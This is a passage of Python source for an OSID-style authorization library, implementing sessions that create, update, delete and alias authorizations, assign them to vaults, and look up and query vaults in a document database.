raise errors.InvalidArgument('argument type is not an AuthorizationForm')
if authorization_form.is_for_update():
raise errors.InvalidArgument('the AuthorizationForm is for update only, not create')
try:
if self._forms[authorization_form.get_id().get_identifier()] == CREATED:
raise errors.IllegalState('authorization_form already used in a create transaction')
except KeyError:
raise errors.Unsupported('authorization_form did not originate from this session')
if not authorization_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
# try to check first here
try:
osid_map = collection.find_one({"agentId": authorization_form._my_map['agentId'],
"functionId": authorization_form._my_map['functionId'],
"qualifierId": authorization_form._my_map['qualifierId'],
"assignedVaultIds": authorization_form._my_map['assignedVaultIds']})
osid_map['startDate'] = authorization_form._my_map['startDate']
osid_map['endDate'] = authorization_form._my_map['endDate']
collection.save(osid_map)
except errors.NotFound:
insert_result = collection.insert_one(authorization_form._my_map)
self._forms[authorization_form.get_id().get_identifier()] = CREATED
osid_map = collection.find_one({'_id': insert_result.inserted_id})
result = objects.Authorization(
osid_object_map=osid_map,
runtime=self._runtime,
proxy=self._proxy)
return result
def can_update_authorizations(self):
"""Tests if this user can update ``Authorizations``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known updating an
``Authorization`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
update operations to an unauthorized user.
return: (boolean) - ``false`` if authorization modification is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_update_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def get_authorization_form_for_update(self, authorization_id):
"""Gets the authorization form for updating an existing authorization.
A new authorization form should be requested for each update
transaction.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
return: (osid.authorization.AuthorizationForm) - the
authorization form
raise: NotFound - ``authorization_id`` is not found
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.get_resource_form_for_update_template
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
if not isinstance(authorization_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
if (authorization_id.get_identifier_namespace() != 'authorization.Authorization' or
authorization_id.get_authority() != self._authority):
raise errors.InvalidArgument()
result = collection.find_one({'_id': ObjectId(authorization_id.get_identifier())})
obj_form = objects.AuthorizationForm(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
self._forms[obj_form.get_id().get_identifier()] = not UPDATED
return obj_form
@utilities.arguments_not_none
def update_authorization(self, authorization_form):
"""Updates an existing authorization.
arg: authorization_form
(osid.authorization.AuthorizationForm): the
authorization ``Id``
raise: IllegalState - ``authorization_form`` already used in an
update transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``authorization_form`` is ``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - ``authorization_form`` did not originate
from ``get_authorization_form_for_update()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.update_resource_template
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
if not isinstance(authorization_form, ABCAuthorizationForm):
raise errors.InvalidArgument('argument type is not an AuthorizationForm')
if not authorization_form.is_for_update():
raise errors.InvalidArgument('the AuthorizationForm is for update only, not create')
try:
if self._forms[authorization_form.get_id().get_identifier()] == UPDATED:
raise errors.IllegalState('authorization_form already used in an update transaction')
except KeyError:
raise errors.Unsupported('authorization_form did not originate from this session')
if not authorization_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
collection.save(authorization_form._my_map)
self._forms[authorization_form.get_id().get_identifier()] = UPDATED
# Note: this is out of spec. The OSIDs don't require an object to be returned:
return objects.Authorization(
osid_object_map=authorization_form._my_map,
runtime=self._runtime,
proxy=self._proxy)
def can_delete_authorizations(self):
"""Tests if this user can delete ``Authorizations``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known deleting an
``Authorization`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
delete operations to an unauthorized user.
return: (boolean) - ``false`` if ``Authorization`` deletion is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_delete_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def delete_authorization(self, authorization_id):
"""Deletes the ``Authorization`` identified by the given ``Id``.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization`` to delete
raise: NotFound - an ``Authorization`` was not found identified
by the given ``Id``
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.delete_resource_template
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
if not isinstance(authorization_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
authorization_map = collection.find_one(
dict({'_id': ObjectId(authorization_id.get_identifier())},
**self._view_filter()))
objects.Authorization(osid_object_map=authorization_map, runtime=self._runtime, proxy=self._proxy)._delete()
collection.delete_one({'_id': ObjectId(authorization_id.get_identifier())})
def can_manage_authorization_aliases(self):
"""Tests if this user can manage ``Id`` aliases for ``Authorizations``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known changing an alias
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer alias
operations to an unauthorized user.
return: (boolean) - ``false`` if ``Authorization`` aliasing is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def alias_authorization(self, authorization_id, alias_id):
"""Adds an ``Id`` to an ``Authorization`` for the purpose of creating compatibility.
The primary ``Id`` of the ``Authorization`` is determined by the
provider. The new ``Id`` performs as an alias to the primary
``Id``. If the alias is a pointer to another authorization. it
is reassigned to the given authorization ``Id``.
arg: authorization_id (osid.id.Id): the ``Id`` of an
``Authorization``
arg: alias_id (osid.id.Id): the alias ``Id``
raise: AlreadyExists - ``alias_id`` is already assigned
raise: NotFound - ``authorization_id`` not found
raise: NullArgument - ``authorization_id`` or ``alias_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.alias_resources_template
self._alias_id(primary_id=authorization_id, equivalent_id=alias_id)
class AuthorizationVaultSession(abc_authorization_sessions.AuthorizationVaultSession, osid_sessions.OsidSession):
"""This session provides methods to retrieve ``Authorization`` to ``Vault`` mappings.
An ``Authorization`` may appear in multiple ``Vaults``. Each
``Vault`` may have its own authorizations governing who is allowed
to look at it.
This lookup session defines several views:
* comparative view: elements may be silently omitted or re-ordered
* plenary view: provides a complete result set or is an error
condition
"""
_session_namespace = 'authorization.AuthorizationVaultSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession._init_catalog(self, proxy, runtime)
self._catalog_view = COMPARATIVE
self._kwargs = kwargs
def use_comparative_vault_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_comparative_bin_view
self._catalog_view = COMPARATIVE
if self._catalog_session is not None:
self._catalog_session.use_comparative_catalog_view()
def use_plenary_vault_view(self):
"""A complete view of the ``Authorization`` and ``Vault`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_plenary_bin_view
self._catalog_view = PLENARY
if self._catalog_session is not None:
self._catalog_session.use_plenary_catalog_view()
def can_lookup_authorization_vault_mappings(self):
"""Tests if this user can perform lookups of authorization/vault mappings.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known lookup methods in
this session will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
lookup operations to unauthorized users.
return: (boolean) - ``false`` if looking up mappings is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.can_lookup_resource_bin_mappings
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def get_authorization_ids_by_vault(self, vault_id):
"""Gets the list of ``Authorization`` ``Ids`` associated with a ``Vault``.
arg: vault_id (osid.id.Id): ``Id`` of a ``Vault``
return: (osid.id.IdList) - list of related authorization ``Ids``
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_resource_ids_by_bin
id_list = []
for authorization in self.get_authorizations_by_vault(vault_id):
id_list.append(authorization.get_id())
return IdList(id_list)
@utilities.arguments_not_none
def get_authorizations_by_vault(self, vault_id):
"""Gets the list of ``Authorizations`` associated with a ``Vault``.
arg: vault_id (osid.id.Id): ``Id`` of a ``Vault``
return: (osid.authorization.AuthorizationList) - list of related
authorization
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_resources_by_bin
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_authorization_lookup_session_for_vault(vault_ids, proxy=self._proxy)
lookup_session.use_isolated_vault_view()
return lookup_session.get_authorizations()
@utilities.arguments_not_none
def get_authorizations_ids_by_vault(self, vault_ids):
"""Gets the list of ``Authorization Ids`` corresponding to a list of ``Vault`` objects.
arg: vault_ids (osid.id.IdList): list of vault ``Ids``
return: (osid.id.IdList) - list of authorization ``Ids``
raise: NullArgument - ``vault_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_resource_ids_by_bin
id_list = []
for authorization in self.get_authorizations_by_vault(vault_ids):
id_list.append(authorization.get_id())
return IdList(id_list)
@utilities.arguments_not_none
def get_authorizations_by_vault(self, vault_ids):
"""Gets the list of ``Authorizations`` corresponding to a list of ``Vault``.
arg: vault_ids (osid.id.IdList): list of vault ``Ids``
return: (osid.authorization.AuthorizationList) - list of
authorizations
raise: NullArgument - ``vault_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_resources_by_bin
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_authorization_lookup_session_for_vault(vault_ids, proxy=self._proxy)
lookup_session.use_isolated_vault_view()
return lookup_session.get_authorizations()
@utilities.arguments_not_none
def get_vault_ids_by_authorization(self, authorization_id):
"""Gets the list of ``Vault`` ``Ids`` mapped to an ``Authorization``.
arg: authorization_id (osid.id.Id): ``Id`` of an
``Authorization``
return: (osid.id.IdList) - list of vault ``Ids``
raise: NotFound - ``authorization_id`` is not found
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_bin_ids_by_resource
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_authorization_lookup_session(proxy=self._proxy)
lookup_session.use_federated_vault_view()
authorization = lookup_session.get_authorization(authorization_id)
id_list = []
for idstr in authorization._my_map['assignedVaultIds']:
id_list.append(Id(idstr))
return IdList(id_list)
@utilities.arguments_not_none
def get_vault_by_authorization(self, authorization_id):
"""Gets the list of ``Vault`` objects mapped to an ``Authorization``.
arg: authorization_id (osid.id.Id): ``Id`` of an
``Authorization``
return: (osid.authorization.VaultList) - list of vault
raise: NotFound - ``authorization_id`` is not found
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
class AuthorizationVaultAssignmentSession(abc_authorization_sessions.AuthorizationVaultAssignmentSession, osid_sessions.OsidSession):
"""This session provides methods to re-assign ``Authorizations`` to ``Vault``.
An ``Authorization`` may map to multiple ``Vault`` objects and
removing the last reference to a ``Authorization`` is the equivalent
of deleting it. Each ``Vault`` may have its own authorizations
governing who is allowed to operate on it.
Moving or adding a reference of a ``Authorization`` to another
``Vault`` is not a copy operation (eg: does not change its ``Id`` ).
"""
_session_namespace = 'authorization.AuthorizationVaultAssignmentSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession._init_catalog(self, proxy, runtime)
self._catalog_name = 'Vault'
self._forms = dict()
self._kwargs = kwargs
def can_assign_authorizations(self):
"""Tests if this user can alter authorization/vault mappings.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known mapping methods in
this session will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
assignment operations to unauthorized users.
return: (boolean) - ``false`` if mapping is not authorized,
``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.can_assign_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def can_assign_authorizations_to_vault(self, vault_id):
"""Tests if this user can alter authorization/vault mappings.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known mapping methods in
this session will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
assignment operations to unauthorized users.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
return: (boolean) - ``false`` if mapping is not authorized,
``true`` otherwise
raise: NullArgument - ``vault_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.can_assign_resources_to_bin
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if vault_id.get_identifier() == '000000000000000000000000':
return False
return True
@utilities.arguments_not_none
def get_assignable_vault_ids(self, vault_id):
"""Gets a list of vault including and under the given vault node in which any authorization can be assigned.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
return: (osid.id.IdList) - list of assignable vault ``Ids``
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids
# This will likely be overridden by an authorization adapter
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_vault_lookup_session(proxy=self._proxy)
vaults = lookup_session.get_vaults()
id_list = []
for vault in vaults:
id_list.append(vault.get_id())
return IdList(id_list)
@utilities.arguments_not_none
def get_assignable_vault_ids_for_authorization(self, vault_id, authorization_id):
"""Gets a list of vault including and under the given vault node in which a specific authorization can be assigned.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
return: (osid.id.IdList) - list of assignable vault ``Ids``
raise: NullArgument - ``vault_id`` or ``authorization_id`` is
``null``
raise: OperationFailed - unable to complete request
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids_for_resource
# This will likely be overridden by an authorization adapter
return self.get_assignable_vault_ids(vault_id)
@utilities.arguments_not_none
def assign_authorization_to_vault(self, authorization_id, vault_id):
"""Adds an existing ``Authorization`` to a ``Vault``.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
raise: AlreadyExists - ``authorization_id`` is already assigned
to ``vault_id``
raise: NotFound - ``authorization_id`` or ``vault_id`` not
found
raise: NullArgument - ``authorization_id`` or ``vault_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.assign_resource_to_bin
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_vault_lookup_session(proxy=self._proxy)
lookup_session.get_vault(vault_id) # to raise NotFound
self._assign_object_to_catalog(authorization_id, vault_id)
@utilities.arguments_not_none
def unassign_authorization_from_vault(self, authorization_id, vault_id):
"""Removes an ``Authorization`` from a ``Vault``.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
raise: NotFound - ``authorization_id`` or ``vault_id`` not
found or ``authorization_id`` not assigned to
``vault_id``
raise: NullArgument - ``authorization_id`` or ``vault_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.unassign_resource_from_bin
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_vault_lookup_session(proxy=self._proxy)
lookup_session.get_vault(vault_id) # to raise NotFound
self._unassign_object_from_catalog(authorization_id, vault_id)
@utilities.arguments_not_none
def reassign_authorization_to_vault(self, authorization_id, from_vault_id, to_vault_id):
"""Moves an ``Authorization`` from one ``Vault`` to another.
Mappings to other ``Vaults`` are unaffected.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
arg: from_vault_id (osid.id.Id): the ``Id`` of the current
``Vault``
arg: to_vault_id (osid.id.Id): the ``Id`` of the destination
``Vault``
raise: NotFound - ``authorization_id, from_vault_id,`` or
``to_vault_id`` not found or ``authorization_id`` not
mapped to ``from_vault_id``
raise: NullArgument - ``authorization_id, from_vault_id,`` or
``to_vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.reassign_resource_to_bin
self.assign_authorization_to_vault(authorization_id, to_vault_id)
try:
self.unassign_authorization_from_vault(authorization_id, from_vault_id)
except: # something went wrong, roll back assignment to to_vault_id
self.unassign_authorization_from_vault(authorization_id, to_vault_id)
raise
class VaultLookupSession(abc_authorization_sessions.VaultLookupSession, osid_sessions.OsidSession):
"""This session provides methods for retrieving ``Vault`` objects.
The ``Vault`` represents a collection of ``Functions`` and
``Authorizations``.
This session defines views that offer differing behaviors when
retrieving multiple objects.
* comparative view: elements may be silently omitted or re-ordered
* plenary view: provides a complete set or is an error condition
Generally, the comparative view should be used for most applications
as it permits operation even if there is data that cannot be
accessed. For example, a browsing application may only need to
examine the ``Vaults`` it can access, without breaking execution.
However, an administrative application may require all ``Vault``
elements to be available.
Vaults may have an additional records indicated by their respective
record types. The record may not be accessed through a cast of the
``Vault``.
"""
_session_namespace = 'authorization.VaultLookupSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_lookup_session()
self._catalog_session.use_comparative_catalog_view()
self._catalog_view = COMPARATIVE
self._kwargs = kwargs
def can_lookup_vaults(self):
"""Tests if this user can perform ``Vault`` lookups.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations to unauthorized users.
return: (boolean) - ``false`` if lookup methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.can_lookup_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_lookup_catalogs()
return True
def use_comparative_vault_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_comparative_bin_view
self._catalog_view = COMPARATIVE
if self._catalog_session is not None:
self._catalog_session.use_comparative_catalog_view()
def use_plenary_vault_view(self):
"""A complete view of the ``Vault`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_plenary_bin_view
self._catalog_view = PLENARY
if self._catalog_session is not None:
self._catalog_session.use_plenary_catalog_view()
@utilities.arguments_not_none
def get_vault(self, vault_id):
"""Gets the ``Vault`` specified by its ``Id``.
In plenary mode, the exact ``Id`` is found or a ``NotFound``
results. Otherwise, the returned ``Vault`` may have a different
``Id`` than requested, such as the case where a duplicate ``Id``
was assigned to a ``Vault`` and retained for compatibility.
arg: vault_id (osid.id.Id): ``Id`` of the ``Vault``
return: (osid.authorization.Vault) - the vault
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.get_bin
if self._catalog_session is not None:
return self._catalog_session.get_catalog(catalog_id=vault_id)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
# Need to consider how to best deal with the "phantom root" catalog issue
if vault_id.get_identifier() == PHANTOM_ROOT_IDENTIFIER:
return self._get_phantom_root_catalog(cat_class=objects.Vault, cat_name='Vault')
try:
result = collection.find_one({'_id': ObjectId(self._get_id(vault_id, 'authorization').get_identifier())})
except errors.NotFound:
# Try creating an orchestrated Vault. Let it raise errors.NotFound()
result = self._create_orchestrated_cat(vault_id, 'authorization', 'Vault')
return objects.Vault(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_vaults_by_ids(self, vault_ids):
"""Gets a ``VaultList`` corresponding to the given ``IdList``.
In plenary mode, the returned list contains all of the vaults
specified in the ``Id`` list, in the order of the list,
including duplicates, or an error results if an ``Id`` in the
supplied list is not found or inaccessible. Otherwise,
inaccessible ``Vault`` objects may be omitted from the list and
may present the elements in any order including returning a
unique set.
arg: vault_ids (osid.id.IdList): the list of ``Ids`` to
retrieve
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NotFound - an ``Id was`` not found
raise: NullArgument - ``vault_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.get_bins_by_ids_template
# NOTE: This implementation currently ignores plenary view
# Also, this should be implemented to use get_Vault() instead of direct to database
if self._catalog_session is not None:
return self._catalog_session.get_catalogs_by_ids(catalog_ids=vault_ids)
catalog_id_list = []
for i in vault_ids:
catalog_id_list.append(ObjectId(i.get_identifier()))
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
result = collection.find({'_id': {'$in': catalog_id_list}}).sort('_id', DESCENDING)
return objects.VaultList(result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_vaults_by_genus_type(self, vault_genus_type):
"""Gets a ``VaultList`` corresponding to the given vault genus ``Type`` which does not include vaults of types derived from the specified ``Type``.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
arg: vault_genus_type (osid.type.Type): a vault genus type
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NullArgument - ``vault_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
result = collection.find({'genusTypeId': {'$in': [str(vault_genus_type)]}}).sort('_id', DESCENDING)
return objects.VaultList(result, runtime=self._runtime)
@utilities.arguments_not_none
def get_vaults_by_parent_genus_type(self, vault_genus_type):
"""Gets a ``VaultList`` corresponding to the given vault genus ``Type`` and include any additional vaults with genus types derived from the specified ``Type``.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
arg: vault_genus_type (osid.type.Type): a vault genus type
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NullArgument - ``vault_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_vaults_by_record_type(self, vault_record_type):
"""Gets a ``VaultList`` containing the given vault record ``Type``.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
arg: vault_record_type (osid.type.Type): a vault record type
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NullArgument - ``vault_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_vaults_by_provider(self, resource_id):
"""Gets a ``VaultList`` from the given provider ````.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
arg: resource_id (osid.id.Id): a resource ``Id``
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NullArgument - ``resource_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_vaults(self):
"""Gets all ``Vaults``.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
return: (osid.authorization.VaultList) - a ``VaultList``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.get_bins_template
# NOTE: This implementation currently ignores plenary view
if self._catalog_session is not None:
return self._catalog_session.get_catalogs()
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
result = collection.find().sort('_id', DESCENDING)
return objects.VaultList(result, runtime=self._runtime, proxy=self._proxy)
vaults = property(fget=get_vaults)
class VaultQuerySession(abc_authorization_sessions.VaultQuerySession, osid_sessions.OsidSession):
"""This session provides methods for searching among ``Vault`` objects.
The search query is constructed using the ``VaultQuery``.
Vaults may have a query record indicated by their respective record
types. The query record is accessed via the ``VaultQuery``.
"""
_session_namespace = 'authorization.VaultQuerySession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_query_session()
self._forms = dict()
self._kwargs = kwargs
def can_search_vaults(self):
"""Tests if this user can perform ``Vault`` searches.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer search
operations to unauthorized users.
return: (boolean) - ``false`` if search methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinQuerySession.can_search_bins_template
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
def get_vault_query(self):
"""Gets a vault query.
return: (osid.authorization.VaultQuery) - a vault query
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinQuerySession.get_bin_query_template
return queries.VaultQuery(runtime=self._runtime)
vault_query = property(fget=get_vault_query)
@utilities.arguments_not_none
def get_vaults_by_query(self, vault_query):
"""Gets a list of ``Vault`` objects matching the given search.
arg: vault_query (osid.authorization.VaultQuery): the vault
query
return: (osid.authorization.VaultList) - the returned
``VaultList``
raise: NullArgument - ``vault_query`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``vault_query`` is not of this service
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinQuerySession.get_bins_by_query_template
if self._catalog_session is not None:
return self._catalog_session.get_catalogs_by_query(vault_query)
query_terms = dict(vault_query._query_terms)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
result = collection.find(query_terms).sort('_id', DESCENDING)
return objects.VaultList(result, runtime=self._runtime)
class VaultAdminSession(abc_authorization_sessions.VaultAdminSession, osid_sessions.OsidSession):
"""This session creates, updates, and deletes ``Vaults``.
The data for create and update is provided by the consumer via the
form object. ``OsidForms`` are requested for each create or update
and may not be reused.
Create and update operations differ in their usage. To create a
``Vault,`` a ``VaultForm`` is requested using
``get_vault_form_for_create()`` specifying the desired record
``Types`` or none if no record ``Types`` are needed. The returned
``VaultForm`` will indicate that it is to be used with a create
operation and can be used to examine metdata or validate data prior
to creation. Once the ``VaultForm`` is submiited to a create
operation, it cannot be reused with another create operation unless
the first operation was unsuccessful. Each ``VaultForm`` corresponds
to an attempted transaction.
For updates, ``VaultForms`` are requested to the ``Vault`` ``Id``
that is to be updated using ``getVaultFormForUpdate()``. Similarly,
the ``VaultForm`` has metadata about the data that can be updated
and it can perform validation before submitting the update. The
``VaultForm`` can only be used once for a successful update and
cannot be reused.
The delete operations delete ``Vaults``. It is safer to remove all
